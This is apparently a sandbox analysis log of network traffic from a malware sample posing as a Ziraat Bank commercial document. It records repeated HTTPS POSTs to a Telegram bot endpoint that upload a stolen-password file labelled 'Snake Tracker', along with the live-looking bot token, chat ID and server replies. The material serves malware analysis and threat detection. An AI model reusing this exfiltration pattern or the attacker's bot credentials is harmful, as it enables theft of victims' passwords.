                                      131192.168.2.449880149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:10 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd15016b1ea21c
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:10 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 30 31 36 62 31 65 61 32 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd15016b1ea21cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:10 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:10 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 14
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:10 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 34 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 14","parameters":{"retry_after":14}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      132192.168.2.449881149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:11 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd16f86a2bc2cd
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:11 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 36 66 38 36 61 32 62 63 32 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd16f86a2bc2cdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:11 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:11 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 13
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:11 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 33 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 13","parameters":{"retry_after":13}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      133192.168.2.449882149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:12 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd1749e1d9f2d8
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:12 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 37 34 39 65 31 64 39 66 32 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd1749e1d9f2d8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:12 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:12 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 12
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:12 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 32 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 12","parameters":{"retry_after":12}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      134192.168.2.449883149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:13 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd179fe028ee6b
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:13 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 37 39 66 65 30 32 38 65 65 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd179fe028ee6bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:13 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:13 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 11
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:13 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 31 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 11","parameters":{"retry_after":11}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      135192.168.2.449884149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:14 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd17df79de90e0
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:14 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 37 64 66 37 39 64 65 39 30 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd17df79de90e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:14 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:14 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 10
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:14 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      136192.168.2.449885149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:15 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd184510fb928c
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:15 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 38 34 35 31 30 66 62 39 32 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd184510fb928cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:15 UTC369INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:15 GMT
                                      Content-Type: application/json
                                      Content-Length: 109
                                      Connection: close
                                      Retry-After: 9
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:15 UTC109INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      137192.168.2.449886149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:16 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd1898e07eb2d9
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:16 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 38 39 38 65 30 37 65 62 32 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd1898e07eb2d9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:24 UTC369INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:24 GMT
                                      Content-Type: application/json
                                      Content-Length: 109
                                      Connection: close
                                      Retry-After: 3
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:24 UTC109INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 3","parameters":{"retry_after":3}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      138192.168.2.449887149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:25 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd1d2dde54b38a
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:25 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 64 32 64 64 65 35 34 62 33 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd1d2dde54b38aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:28 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:27 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 34 37 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35882,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341347,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      139192.168.2.449888149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:29 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd2027b47c0eb6
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:29 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 32 37 62 34 37 63 30 65 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd2027b47c0eb6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:29 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
